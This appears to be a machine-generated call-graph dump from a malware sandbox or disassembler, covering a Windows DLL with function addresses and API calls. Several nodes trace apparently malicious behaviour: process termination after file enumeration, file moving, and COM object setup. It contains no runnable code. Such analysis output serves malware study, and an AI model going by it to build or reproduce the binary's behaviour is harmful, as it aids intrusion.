6cdf2997 12685->12686 12687 6cdf10ab __DllMainCRTStartup@12 59 API calls 12686->12687 12688 6cdf29ae __DllMainCRTStartup@12 12687->12688 12689 6cdf1024 __DllMainCRTStartup@12 58 API calls 12688->12689 12690 6cdf29f4 12689->12690 12691 6cdfb786 ___std_exception_copy 17 API calls 12690->12691 12692 6cdf29fa ExpandEnvironmentStringsW 12691->12692 12745 6cdf15a4 12692->12745 12696 6cdf1012 ExitProcess 12767 6cdf107d 12697->12767 12701 6cdf103d __DllMainCRTStartup@12 12700->12701 13007 6cdfa9ac 12701->13007 12704 6cdfb786 12705 6cdfe224 __freea 17 API calls 12704->12705 12706 6cdf2897 GetEnvironmentVariableW 12705->12706 12707 6cdf1274 12706->12707 13188 6cdf41f0 12707->13188 12710 6cdf10ab __DllMainCRTStartup@12 59 API calls 12711 6cdf12c6 __DllMainCRTStartup@12 12710->12711 12712 6cdf130d GetProcAddress 12711->12712 12713 6cdfb786 ___std_exception_copy 17 API calls 12712->12713 12714 6cdf1325 12713->12714 12715 6cdf10ab __DllMainCRTStartup@12 59 API calls 12714->12715 12716 6cdf1337 __DllMainCRTStartup@12 12715->12716 12717 6cdf137e GetProcAddress 12716->12717 12718 6cdfb786 ___std_exception_copy 17 API calls 12717->12718 12719 6cdf1395 12718->12719 12720 6cdf10ab __DllMainCRTStartup@12 59 API calls 12719->12720 12721 6cdf13a7 __DllMainCRTStartup@12 12720->12721 12722 6cdf13ec GetProcAddress 12721->12722 12723 6cdfb786 ___std_exception_copy 17 API calls 12722->12723 12724 6cdf1403 12723->12724 12725 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 12724->12725 12726 6cdf1416 12725->12726 12727 6cdf141e 12726->12727 12728 6cdf1448 __fread_nolock 12727->12728 12729 6cdf10ab __DllMainCRTStartup@12 59 API calls 12728->12729 12730 6cdf145d __DllMainCRTStartup@12 12729->12730 12731 6cdf1024 __DllMainCRTStartup@12 58 API calls 12730->12731 12732 6cdf14a0 12731->12732 12733 6cdfb786 ___std_exception_copy 17 API calls 12732->12733 12734 6cdf14a6 __fread_nolock 12733->12734 12735 6cdf10ab __DllMainCRTStartup@12 59 API calls 12734->12735 12736 6cdf14e9 __DllMainCRTStartup@12 12735->12736 12737 6cdf1024 __DllMainCRTStartup@12 58 API calls 12736->12737 12738 6cdf152f 12737->12738 12739 6cdfb786 ___std_exception_copy 17 API calls 12738->12739 12740 6cdf1535 12739->12740 12741 6cdf1024 __DllMainCRTStartup@12 58 API calls 12740->12741 12742 6cdf1558 Sleep CreateProcessW 12741->12742 12743 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 12742->12743 12744 6cdf159d Sleep Sleep 12743->12744 12744->12675 12746 6cdf1024 __DllMainCRTStartup@12 58 API calls 12745->12746 12747 6cdf164e FindFirstFileW 12746->12747 12751 6cdf166a 12747->12751 12748 6cdf1770 12749 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 12748->12749 12750 6cdf178d 12749->12750 12760 6cdf2d25 12750->12760 12751->12748 12752 6cdf174e FindNextFileW 12751->12752 12753 6cdf1024 __DllMainCRTStartup@12 58 API calls 12751->12753 12754 6cdf15a4 __DllMainCRTStartup@12 126 API calls 12751->12754 12755 6cdf16ef 12751->12755 12752->12751 12753->12751 12754->12751 12756 6cdf1024 __DllMainCRTStartup@12 58 API calls 12755->12756 12757 6cdf170a TerminateProcess CloseHandle CloseHandle 12756->12757 13190 6cdf1795 12757->13190 12761 6cdf2d2e IsProcessorFeaturePresent 12760->12761 12762 6cdf2d2d 12760->12762 12764 6cdf3169 12761->12764 12762->12696 14101 6cdf312c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12764->14101 12766 6cdf324c 12766->12696 12768 6cdf1094 __DllMainCRTStartup@12 12767->12768 12771 6cdfa96b 12768->12771 12772 6cdfa97f __wsopen_s 12771->12772 12777 6cdf677e 12772->12777 12778 6cdf67ad 12777->12778 12779 6cdf678a 12777->12779 12783 6cdf67d4 12778->12783 12803 6cdf6487 12778->12803 12791 6cdfbc5d 12779->12791 12782 6cdfbc5d __wsopen_s 33 API calls 12784 6cdf67a5 12782->12784 12783->12782 12783->12784 12785 6cdf5f8b 12784->12785 12786 6cdf5f97 12785->12786 12788 6cdf5fae 12786->12788 12953 6cdf63d4 12786->12953 12789 6cdf109e 12788->12789 12790 6cdf63d4 __wsopen_s 50 API calls 12788->12790 12789->12666 12790->12789 12792 6cdfbc6d 12791->12792 12793 6cdfbc74 12791->12793 12814 6cdf638e GetLastError 12792->12814 12795 6cdfbc82 12793->12795 12818 6cdfbab5 12793->12818 12796 6cdfbc91 mydllmain 12795->12796 12799 6cdfbc9b 12796->12799 12798 6cdfbca9 12798->12796 12800 6cdfbcd4 12798->12800 12799->12784 12821 6cdfbd07 IsProcessorFeaturePresent 12800->12821 12802 6cdfbcd9 12804 6cdf64d6 12803->12804 12805 6cdf64b3 12803->12805 12804->12805 12809 6cdf64de __DllMainCRTStartup@12 12804->12809 12806 6cdfbc5d __wsopen_s 33 API calls 12805->12806 12807 6cdf64cb 12806->12807 12808 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 12807->12808 12810 6cdf65f9 12808->12810 12853 6cdf8958 12809->12853 12810->12783 12815 6cdf63a7 12814->12815 12825 6cdfd479 12815->12825 12819 6cdfbad9 12818->12819 12820 6cdfbac0 GetLastError SetLastError 12818->12820 12819->12798 12820->12798 12822 6cdfbd13 12821->12822 12847 6cdfbade 12822->12847 12826 6cdfd48c 12825->12826 12827 6cdfd492 12825->12827 12828 6cdff9e2 _unexpected 7 API calls 12826->12828 12829 6cdffa21 _unexpected 7 API calls 12827->12829 12846 6cdf63bf SetLastError 12827->12846 12828->12827 12830 6cdfd4ac 12829->12830 12831 6cdff70a _unexpected 17 API calls 12830->12831 12830->12846 12832 6cdfd4bc 12831->12832 12833 6cdfd4d9 12832->12833 12834 6cdfd4c4 12832->12834 12836 6cdffa21 _unexpected 7 API calls 12833->12836 12835 6cdffa21 _unexpected 7 API calls 12834->12835 12837 6cdfd4d0 12835->12837 12838 6cdfd4e5 12836->12838 12841 6cdfe224 __freea 17 API calls 12837->12841 12839 6cdfd4e9 12838->12839 12840 6cdfd4f8 12838->12840 12842 6cdffa21 _unexpected 7 API calls 12839->12842 12843 6cdfd079 _unexpected 17 API calls 12840->12843 12841->12846 12842->12837 12844 6cdfd503 12843->12844 12845 6cdfe224 __freea 17 API calls 12844->12845 12845->12846 12846->12793 12848 6cdfbafa __fread_nolock __FrameHandler3::FrameUnwindToState 12847->12848 12849 6cdfbb26 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12848->12849 12850 6cdfbbf7 __FrameHandler3::FrameUnwindToState 12849->12850 12851 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 12850->12851 12852 6cdfbc15 GetCurrentProcess TerminateProcess 12851->12852 12852->12802 12870 6cdfa60e 12853->12870 12855 6cdf8972 __DllMainCRTStartup@12 12856 6cdf897d 12855->12856 12857 6cdf655f 12855->12857 12863 6cdf8a81 12855->12863 12874 6cdfa560 12855->12874 12881 6cdf85b6 12855->12881 12884 6cdf8fd5 12855->12884 12918 6cdf95fa 12855->12918 12858 6cdfbc5d __wsopen_s 33 API calls 12856->12858 12867 6cdf836c 12857->12867 12858->12857 12864 6cdfbc5d __wsopen_s 33 API calls 12863->12864 12865 6cdf8a9b 12864->12865 12866 6cdfbc5d __wsopen_s 33 API calls 12865->12866 12866->12857 12947 6cdfe224 12867->12947 12871 6cdfa619 12870->12871 12873 6cdfa632 12870->12873 12872 6cdfbc5d __wsopen_s 33 API calls 12871->12872 12872->12873 12873->12855 12875 6cdf63d4 __wsopen_s 50 API calls 12874->12875 12876 6cdfa570 12875->12876 12877 6cdfe5ab __wsopen_s 50 API calls 12876->12877 12878 6cdfa58d 12877->12878 12879 6cdfe609 __wsopen_s 50 API calls 12878->12879 12880 6cdfa59a 12879->12880 12880->12855 12882 6cdf6ab9 __DllMainCRTStartup@12 50 API calls 12881->12882 12883 6cdf85f1 12882->12883 12883->12855 12885 6cdf8fdc 12884->12885 12886 6cdf8ff3 12884->12886 12888 6cdf967f 12885->12888 12889 6cdf961f 12885->12889 12895 6cdf9032 12885->12895 12887 6cdfbc5d __wsopen_s 33 API calls 12886->12887 12886->12895 12890 6cdf9027 12887->12890 12891 6cdf96b8 12888->12891 12892 6cdf9684 12888->12892 12893 6cdf96a5 12889->12893 12894 6cdf9625 12889->12894 12890->12855 12896 6cdf96bd 12891->12896 12897 6cdf96d5 12891->12897 12898 6cdf9686 12892->12898 12899 6cdf96b1 12892->12899 12902 6cdf75d8 __DllMainCRTStartup@12 34 API calls 12893->12902 12905 6cdf9676 12894->12905 12906 6cdf962a 12894->12906 12895->12855 12896->12893 12896->12905 12917 6cdf9650 __DllMainCRTStartup@12 12896->12917 12900 6cdfa39b __DllMainCRTStartup@12 34 API calls 12897->12900 12901 6cdf9639 12898->12901 12908 6cdf9695 12898->12908 12903 6cdfa361 __DllMainCRTStartup@12 34 API calls 12899->12903 12900->12917 12904 6cdf9e67 __DllMainCRTStartup@12 57 API calls 12901->12904 12916 6cdf96de __DllMainCRTStartup@12 12901->12916 12902->12917 12903->12917 12904->12917 12907 6cdf78f7 __DllMainCRTStartup@12 34 API calls 12905->12907 12905->12916 12906->12901 12909 6cdf9663 12906->12909 12906->12917 12907->12917 12908->12893 12910 6cdf9699 12908->12910 12911 6cdfa19f __DllMainCRTStartup@12 52 API calls 12909->12911 12909->12916 12913 6cdfa2dc __DllMainCRTStartup@12 33 API calls 12910->12913 12910->12916 12911->12917 12912 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 12914 6cdf9957 12912->12914 12913->12917 12914->12855 12915 6cdff193 __DllMainCRTStartup@12 52 API calls 12915->12917 12916->12912 12917->12915 12917->12916 12919 6cdf967f 12918->12919 12920 6cdf961f 12918->12920 12921 6cdf96b8 12919->12921 12922 6cdf9684 12919->12922 12923 6cdf96a5 12920->12923 12924 6cdf9625 12920->12924 12925 6cdf96bd 12921->12925 12926 6cdf96d5 12921->12926 12927 6cdf9686 12922->12927 12928 6cdf96b1 12922->12928 12930 6cdf75d8 __DllMainCRTStartup@12 34 API calls 12923->12930 12934 6cdf9676 12924->12934 12935 6cdf962a 12924->12935 12925->12923 12925->12934 12944 6cdf9650 __DllMainCRTStartup@12 12925->12944 12929 6cdfa39b __DllMainCRTStartup@12 34 API calls 12926->12929 12932 6cdf9639 12927->12932 12938 6cdf9695 12927->12938 12931 6cdfa361 __DllMainCRTStartup@12 34 API calls 12928->12931 12929->12944 12930->12944 12931->12944 12933 6cdf9e67 __DllMainCRTStartup@12 57 API calls 12932->12933 12946 6cdf96de __DllMainCRTStartup@12 12932->12946 12933->12944 12937 6cdf78f7 __DllMainCRTStartup@12 34 API calls 12934->12937 12934->12946 12935->12932 12936 6cdf9663 12935->12936 12935->12944 12940 6cdfa19f __DllMainCRTStartup@12 52 API calls 12936->12940 12936->12946 12937->12944 12938->12923 12939 6cdf9699 12938->12939 12943 6cdfa2dc __DllMainCRTStartup@12 33 API calls 12939->12943 12939->12946 12940->12944 12941 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 12942 6cdf9957 12941->12942 12942->12855 12943->12944 12945 6cdff193 __DllMainCRTStartup@12 52 API calls 12944->12945 12944->12946 12945->12944 12946->12941 12948 6cdfe22f HeapFree 12947->12948 12952 6cdf837c 12947->12952 12949 6cdfe244 GetLastError 12948->12949 12948->12952 12950 6cdfe251 __dosmaperr 12949->12950 12951 6cdfe211 __dosmaperr 15 API calls 12950->12951 12951->12952 12952->12807 12954 6cdf63de 12953->12954 12955 6cdf63e7 12953->12955 12956 6cdf638e __wsopen_s 19 API calls 12954->12956 12955->12788 12957 6cdf63e3 12956->12957 12957->12955 12960 6cdfcb25 12957->12960 12971 6ce02d2d 12960->12971 12963 6cdfcb35 12965 6cdfcb3f IsProcessorFeaturePresent 12963->12965 12970 6cdfcb5e 12963->12970 12966 6cdfcb4b 12965->12966 12968 6cdfbade __FrameHandler3::FrameUnwindToState 8 API calls 12966->12968 12968->12970 13004 6cdfc2aa 12970->13004 12972 6ce02c5b __FrameHandler3::FrameUnwindToState EnterCriticalSection LeaveCriticalSection 12971->12972 12973 6cdfcb2a 12972->12973 12973->12963 12974 6ce02d72 12973->12974 12978 6ce02d7e __FrameHandler3::FrameUnwindToState 12974->12978 12975 6ce02de0 __FrameHandler3::FrameUnwindToState 12982 6ce02e16 __FrameHandler3::FrameUnwindToState 12975->12982 12985 6ce015d1 __FrameHandler3::FrameUnwindToState EnterCriticalSection 12975->12985 12976 6cdfd3c8 __dosmaperr 17 API calls 12983 6ce02daf __FrameHandler3::FrameUnwindToState 12976->12983 12977 6ce02dce 12979 6cdfe211 __dosmaperr 17 API calls 12977->12979 12978->12975 12978->12976 12978->12977 12978->12983 12980 6ce02dd3 12979->12980 12984 6cdfbcda __wsopen_s 48 API calls 12980->12984 12981 6ce02db8 12981->12963 12987 6ce02f50 12982->12987 12988 6ce02e53 12982->12988 13002 6ce02e81 12982->13002 12983->12975 12983->12977 12983->12981 12984->12981 12985->12982 12986 6ce02efc __FrameHandler3::FrameUnwindToState LeaveCriticalSection 12989 6ce02ec8 12986->12989 12990 6ce02f5b 12987->12990 12991 6ce01619 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 12987->12991 12995 6cdfd277 _unexpected 48 API calls 12988->12995 12988->13002 12989->12981 12993 6ce02ed1 12989->12993 12994 6ce02f0c mydllmain 12989->12994 12992 6cdfc2aa __FrameHandler3::FrameUnwindToState 29 API calls 12990->12992 12991->12990 12996 6ce02f63 12992->12996 12997 6cdfd277 _unexpected 48 API calls 12993->12997 13001 6ce02ee7 12994->13001 12998 6ce02e76 12995->12998 12999 6ce02ed6 mydllmain 12997->12999 13000 6cdfd277 _unexpected 48 API calls 12998->13000 12999->13001 13000->13002 13001->12981 13003 6cdfd277 _unexpected 48 API calls 13001->13003 13002->12986 13003->12981 13005 6cdfc0e7 __FrameHandler3::FrameUnwindToState 29 API calls 13004->13005 13006 6cdfc2bb 13005->13006 13008 6cdfa9c0 __wsopen_s 13007->13008 13013 6cdf681d 13008->13013 13011 6cdf5f8b __wsopen_s 50 API calls 13012 6cdf1047 13011->13012 13012->12704 13014 6cdf684c 13013->13014 13015 6cdf6829 13013->13015 13020 6cdf6873 13014->13020 13021 6cdf65fb 13014->13021 13016 6cdfbc5d __wsopen_s 33 API calls 13015->13016 13019 6cdf6844 13016->13019 13017 6cdfbc5d __wsopen_s 33 API calls 13017->13019 13019->13011 13020->13017 13020->13019 13022 6cdf664a 13021->13022 13023 6cdf6627 13021->13023 13022->13023 13026 6cdf6652 __DllMainCRTStartup@12 13022->13026 13024 6cdfbc5d __wsopen_s 33 API calls 13023->13024 13031 6cdf663f 13024->13031 13025 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13027 6cdf677c 13025->13027 13032 6cdf8c3c 13026->13032 13027->13020 13030 6cdf836c __DllMainCRTStartup@12 17 API calls 13030->13031 13031->13025 13033 6cdfa60e __DllMainCRTStartup@12 33 API calls 13032->13033 13037 6cdf8c51 __DllMainCRTStartup@12 13033->13037 13034 6cdf66d3 13034->13030 13035 6cdfbc5d __wsopen_s 33 API calls 13035->13034 13036 6cdf8c5c 13036->13035 13037->13034 13037->13036 13041 6cdf862e 13037->13041 13044 6cdf912e 13037->13044 13085 6cdf9959 13037->13085 13121 6cdf6cc8 13041->13121 13043 6cdf866b 13043->13037 13045 6cdf913c 13044->13045 13046 6cdf9154 13044->13046 13047 6cdf9987 13045->13047 13048 6cdf99f1 13045->13048 13050 6cdf9195 13045->13050 13049 6cdfbc5d __wsopen_s 33 API calls 13046->13049 13046->13050 13051 6cdf998d 13047->13051 13052 6cdf9a19 13047->13052 13054 6cdf99f6 13048->13054 13055 6cdf9a30 13048->13055 13053 6cdf9189 13049->13053 13050->13037 13056 6cdf99be 13051->13056 13057 6cdf9992 13051->13057 13158 6cdf7765 13052->13158 13053->13037 13058 6cdf99f8 13054->13058 13059 6cdf9a27 13054->13059 13060 6cdf9a4f 13055->13060 13061 6cdf9a35 13055->13061 13065 6cdf9998 13056->13065 13070 6cdf99e6 13056->13070 13062 6cdf9a46 13057->13062 13057->13065 13068 6cdf99a0 13058->13068 13074 6cdf9a07 13058->13074 13165 6cdfa37e 13059->13165 13173 6cdfa3b1 13060->13173 13061->13062 13066 6cdf9a3a 13061->13066 13169 6cdfa439 13062->13169 13065->13068 13072 6cdf99cb 13065->13072 13081 6cdf99b9 __DllMainCRTStartup@12 13065->13081 13066->13052 13066->13070 13083 6cdf9a5a __DllMainCRTStartup@12 13068->13083 13131 6cdf9ff8 13068->13131 13070->13083 13147 6cdf7a84 13070->13147 13072->13083 13141 6cdfa234 13072->13141 13074->13052 13076 6cdf9a0b 13074->13076 13076->13083 13154 6cdfa2dc 13076->13154 13077 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13079 6cdf9d4b 13077->13079 13079->13037 13080 6cdfa560 __wsopen_s 50 API calls 13084 6cdf9c3a 13080->13084 13081->13080 13081->13083 13081->13084 13083->13077 13084->13083 13176 6cdff2fd 13084->13176 13086 6cdf9987 13085->13086 13087 6cdf99f1 13085->13087 13088 6cdf998d 13086->13088 13089 6cdf9a19 13086->13089 13090 6cdf99f6 13087->13090 13091 6cdf9a30 13087->13091 13092 6cdf99be 13088->13092 13093 6cdf9992 13088->13093 13100 6cdf7765 __DllMainCRTStartup@12 34 API calls 13089->13100 13094 6cdf99f8 13090->13094 13095 6cdf9a27 13090->13095 13096 6cdf9a4f 13091->13096 13097 6cdf9a35 13091->13097 13102 6cdf9998 13092->13102 13107 6cdf99e6 13092->13107 13098 6cdf9a46 13093->13098 13093->13102 13103 6cdf99a0 13094->13103 13110 6cdf9a07 13094->13110 13101 6cdfa37e __DllMainCRTStartup@12 34 API calls 13095->13101 13099 6cdfa3b1 __DllMainCRTStartup@12 34 API calls 13096->13099 13097->13098 13104 6cdf9a3a 13097->13104 13105 6cdfa439 __DllMainCRTStartup@12 50 API calls 13098->13105 13117 6cdf99b9 __DllMainCRTStartup@12 13099->13117 13100->13117 13101->13117 13102->13103 13108 6cdf99cb 13102->13108 13102->13117 13106 6cdf9ff8 __DllMainCRTStartup@12 57 API calls 13103->13106 13119 6cdf9a5a __DllMainCRTStartup@12 13103->13119 13104->13089 13104->13107 13105->13117 13106->13117 13109 6cdf7a84 __DllMainCRTStartup@12 34 API calls 13107->13109 13107->13119 13111 6cdfa234 __DllMainCRTStartup@12 51 API calls 13108->13111 13108->13119 13109->13117 13110->13089 13112 6cdf9a0b 13110->13112 13111->13117 13114 6cdfa2dc __DllMainCRTStartup@12 33 API calls 13112->13114 13112->13119 13113 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13115 6cdf9d4b 13113->13115 13114->13117 13115->13037 13116 6cdfa560 __wsopen_s 50 API calls 13120 6cdf9c3a 13116->13120 13117->13116 13117->13119 13117->13120 13118 6cdff2fd __wsopen_s 51 API calls 13118->13120 13119->13113 13120->13118 13120->13119 13122 6cdfa5bb __DllMainCRTStartup@12 50 API calls 13121->13122 13123 6cdf6cde 13122->13123 13124 6cdf6cf3 13123->13124 13127 6cdf6d26 13123->13127 13130 6cdf6d0e __DllMainCRTStartup@12 13123->13130 13125 6cdfbc5d __wsopen_s 33 API calls 13124->13125 13125->13130 13126 6cdf7025 13128 6cdfa52b __DllMainCRTStartup@12 50 API calls 13126->13128 13127->13126 13129 6cdfa52b __DllMainCRTStartup@12 50 API calls 13127->13129 13128->13130 13129->13126 13130->13043 13132 6cdfa019 13131->13132 13133 6cdf68e8 __DllMainCRTStartup@12 18 API calls 13132->13133 13134 6cdfa05b __DllMainCRTStartup@12 13133->13134 13135 6cdff012 __DllMainCRTStartup@12 56 API calls 13134->13135 13136 6cdfa0ee 13135->13136 13137 6cdfa560 __wsopen_s 50 API calls 13136->13137 13138 6cdfa111 __DllMainCRTStartup@12 13136->13138 13137->13138 13139 6cdfa560 __wsopen_s 50 API calls 13138->13139 13140 6cdfa14d __DllMainCRTStartup@12 13138->13140 13139->13140 13140->13081 13140->13140 13143 6cdfa261 __DllMainCRTStartup@12 13141->13143 13142 6cdfa27d 13145 6cdff2fd __wsopen_s 51 API calls 13142->13145 13143->13142 13144 6cdfa560 __wsopen_s 50 API calls 13143->13144 13146 6cdfa29e 13143->13146 13144->13142 13145->13146 13146->13081 13148 6cdf7a99 __DllMainCRTStartup@12 13147->13148 13149 6cdf7abb 13148->13149 13151 6cdf7ae2 13148->13151 13150 6cdfbc5d __wsopen_s 33 API calls 13149->13150 13153 6cdf7ad8 __DllMainCRTStartup@12 13150->13153 13152 6cdf6969 __DllMainCRTStartup@12 18 API calls 13151->13152 13151->13153 13152->13153 13153->13081 13155 6cdfa2f2 __DllMainCRTStartup@12 13154->13155 13156 6cdfbc5d __wsopen_s 33 API calls 13155->13156 13157 6cdfa313 13155->13157 13156->13157 13157->13081 13159 6cdf777a __DllMainCRTStartup@12 13158->13159 13160 6cdf779c 13159->13160 13163 6cdf77c3 13159->13163 13161 6cdfbc5d __wsopen_s 33 API calls 13160->13161 13162 6cdf77b9 __DllMainCRTStartup@12 13161->13162 13162->13081 13163->13162 13164 6cdf6969 __DllMainCRTStartup@12 18 API calls 13163->13164 13164->13162 13166 6cdfa38a 13165->13166 13167 6cdf7446 __DllMainCRTStartup@12 34 API calls 13166->13167 13168 6cdfa39a 13167->13168 13168->13081 13170 6cdfa456 __DllMainCRTStartup@12 13169->13170 13171 6cdfa4ad __DllMainCRTStartup@12 50 API calls 13170->13171 13172 6cdfa474 __DllMainCRTStartup@12 13170->13172 13171->13172 13172->13081 13174 6cdf7a84 __DllMainCRTStartup@12 34 API calls 13173->13174 13175 6cdfa3c6 13174->13175 13175->13081 13177 6cdff311 13176->13177 13186 6cdff321 13176->13186 13178 6cdff346 13177->13178 13179 6cdfa560 __wsopen_s 50 API calls 13177->13179 13177->13186 13180 6cdff37a 13178->13180 13181 6cdff357 13178->13181 13179->13178 13183 6cdff3f6 13180->13183 13184 6cdff3a2 13180->13184 13180->13186 13182 6ce058ac __wsopen_s 5 API calls 13181->13182 13182->13186 13185 6ce0293d __fread_nolock MultiByteToWideChar 13183->13185 13184->13186 13187 6ce0293d __fread_nolock MultiByteToWideChar 13184->13187 13185->13186 13186->13084 13187->13186 13189 6cdf12a3 GetModuleHandleW 13188->13189 13189->12710 13232 6cdfaf9b 13190->13232 13196 6cdf190b __DllMainCRTStartup@12 13199 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13196->13199 13201 6cdf174d 13199->13201 13201->12752 13202 6cdfaf9b __DllMainCRTStartup@12 54 API calls 13203 6cdf1851 ___std_exception_copy 13202->13203 13260 6cdfb97a 13203->13260 13205 6cdf1876 __DllMainCRTStartup@12 13263 6cdfad4d 13205->13263 13208 6cdfb786 ___std_exception_copy 17 API calls 13209 6cdf18b5 __DllMainCRTStartup@12 13208->13209 13209->13196 13210 6cdfad4d __DllMainCRTStartup@12 53 API calls 13209->13210 13211 6cdf18f6 13210->13211 13212 6cdfb786 ___std_exception_copy 17 API calls 13211->13212 13213 6cdf18fe 13212->13213 13213->13196 13214 6cdfaf9b __DllMainCRTStartup@12 54 API calls 13213->13214 13215 6cdf1924 13214->13215 13216 6cdfaf9b __DllMainCRTStartup@12 54 API calls 13215->13216 13220 6cdf1931 ___std_exception_copy __DllMainCRTStartup@12 13216->13220 13217 6cdfad4d 53 API calls __DllMainCRTStartup@12 13217->13220 13218 6cdfb786 17 API calls ___std_exception_copy 13218->13220 13220->13196 13220->13217 13220->13218 13221 6cdfb107 __DllMainCRTStartup@12 80 API calls 13220->13221 13222 6cdf1a5b 13220->13222 13269 6cdfb71f 13220->13269 13221->13220 13223 6cdfb107 __DllMainCRTStartup@12 80 API calls 13222->13223 13224 6cdf1a63 13223->13224 13225 6cdf1024 __DllMainCRTStartup@12 58 API calls 13224->13225 13226 6cdf1a7a 13225->13226 13275 6cdfb759 MoveFileExW 13226->13275 13228 6cdf1a84 __DllMainCRTStartup@12 13280 6cdf22df 13228->13280 13230 6cdf1b1b __DllMainCRTStartup@12 13288 6cdf1c39 CoInitialize CoCreateInstance 13230->13288 13233 6cdfafb9 13232->13233 13234 6cdfafa8 13232->13234 13354 6cdfaee5 13233->13354 13349 6cdfe211 13234->13349 13240 6cdfe211 __dosmaperr 17 API calls 13241 6cdf1812 13240->13241 13241->13196 13242 6cdfb420 13241->13242 13243 6cdfb433 __wsopen_s 13242->13243 13489 6cdfb1b1 13243->13489 13246 6cdf5f8b __wsopen_s 50 API calls 13247 6cdf182d 13246->13247 13248 6cdf63fc 13247->13248 13249 6cdf640f __wsopen_s 13248->13249 13557 6cdf5cf0 13249->13557 13252 6cdf5f8b __wsopen_s 50 API calls 13253 6cdf1835 13252->13253 13254 6cdfb107 13253->13254 13255 6cdfb11a __wsopen_s 13254->13255 13611 6cdfafe2 13255->13611 13257 6cdfb126 13258 6cdf5f8b __wsopen_s 50 API calls 13257->13258 13259 6cdf1842 13258->13259 13259->13202 13660 6cdfb997 13260->13660 13264 6cdfad61 __DllMainCRTStartup@12 __wsopen_s 13263->13264 13811 6cdfaa2e 13264->13811 13266 6cdfad82 13267 6cdf5f8b __wsopen_s 50 API calls 13266->13267 13268 6cdf18aa 13267->13268 13268->13208 13270 6cdfb732 __wsopen_s 13269->13270 13913 6cdfb501 13270->13913 13272 6cdfb747 13273 6cdf5f8b __wsopen_s 50 API calls 13272->13273 13274 6cdfb754 13273->13274 13274->13220 13276 6cdfb782 13275->13276 13277 6cdfb770 GetLastError 13275->13277 13276->13228 13278 6cdfe1b7 __dosmaperr 17 API calls 13277->13278 13279 6cdfb77c 13278->13279 13279->13228 13281 6cdf2304 13280->13281 13282 6cdf235c 13281->13282 13285 6cdf2311 __DllMainCRTStartup@12 13281->13285 13980 6cdf119f 13282->13980 13287 6cdf2318 __fread_nolock 13285->13287 13961 6cdf25a0 13285->13961 13287->13230 13289 6cdf1c99 13288->13289 13290 6cdf1cb1 13288->13290 14032 6cdf1053 13289->14032 13292 6cdf22df __DllMainCRTStartup@12 52 API calls 13290->13292 13294 6cdf1cbd 13292->13294 14036 6cdf1b83 13294->14036 13297 6cdf1d4c VariantClear VariantClear VariantClear VariantClear 13298 6cdf1d89 13297->13298 13299 6cdf1d74 13297->13299 14044 6cdf11aa 13298->14044 13301 6cdf1053 __DllMainCRTStartup@12 85 API calls 13299->13301 13315 6cdf1d7f CoUninitialize 13301->13315 13302 6cdf21fa __DllMainCRTStartup@12 13303 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13302->13303 13304 6cdf2255 13303->13304 13304->13196 13306 6cdf1d9b 14053 6cdf1216 13306->14053 13308 6cdf1dc9 13308->13299 13309 6cdf1dd5 13308->13309 13310 6cdf1e0a 13309->13310 13311 6cdf1df5 13309->13311 13313 6cdf11aa __DllMainCRTStartup@12 54 API calls 13310->13313 13318 6cdf1e1e 13310->13318 13312 6cdf1053 __DllMainCRTStartup@12 85 API calls 13311->13312 13312->13315 13316 6cdf1e36 13313->13316 13314 6cdf1053 __DllMainCRTStartup@12 85 API calls 13314->13315 13315->13302 13317 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13316->13317 13319 6cdf1e5e 13317->13319 13318->13314 13319->13318 13320 6cdf11aa __DllMainCRTStartup@12 54 API calls 13319->13320 13321 6cdf1f54 13320->13321 13322 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13321->13322 13323 6cdf1f7c 13322->13323 13324 6cdf1f8b 13323->13324 13325 6cdf1053 __DllMainCRTStartup@12 85 API calls 13323->13325 13326 6cdf11aa __DllMainCRTStartup@12 54 API calls 13324->13326 13325->13324 13327 6cdf1faa 13326->13327 13328 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13327->13328 13329 6cdf1fd2 13328->13329 13329->13318 13330 6cdf11aa __DllMainCRTStartup@12 54 API calls 13329->13330 13331 6cdf2076 13330->13331 13332 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13331->13332 13333 6cdf209c 13332->13333 13334 6cdf11aa __DllMainCRTStartup@12 54 API calls 13333->13334 13335 6cdf20b3 13334->13335 13336 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13335->13336 13337 6cdf20db 13336->13337 13337->13318 13338 6cdf20f3 SysAllocString 13337->13338 13339 6cdf225a 13338->13339 13340 6cdf2113 VariantInit VariantInit 13338->13340 14057 6cdf2b50 mydllmain 13339->14057 13342 6cdf11aa __DllMainCRTStartup@12 54 API calls 13340->13342 13344 6cdf2156 13342->13344 13345 6cdf1216 __DllMainCRTStartup@12 SysFreeString 13344->13345 13346 6cdf21a9 VariantClear VariantClear VariantClear 13345->13346 13346->13318 13347 6cdf21f0 13346->13347 13348 6cdf1053 __DllMainCRTStartup@12 85 API calls 13347->13348 13348->13302 13371 6cdfd3c8 GetLastError 13349->13371 13351 6cdfafad 13352 6cdfbcda 13351->13352 13443 6cdfbc26 13352->13443 13356 6cdfaef1 __FrameHandler3::FrameUnwindToState 13354->13356 13355 6cdfaef8 13357 6cdfe211 __dosmaperr 17 API calls 13355->13357 13356->13355 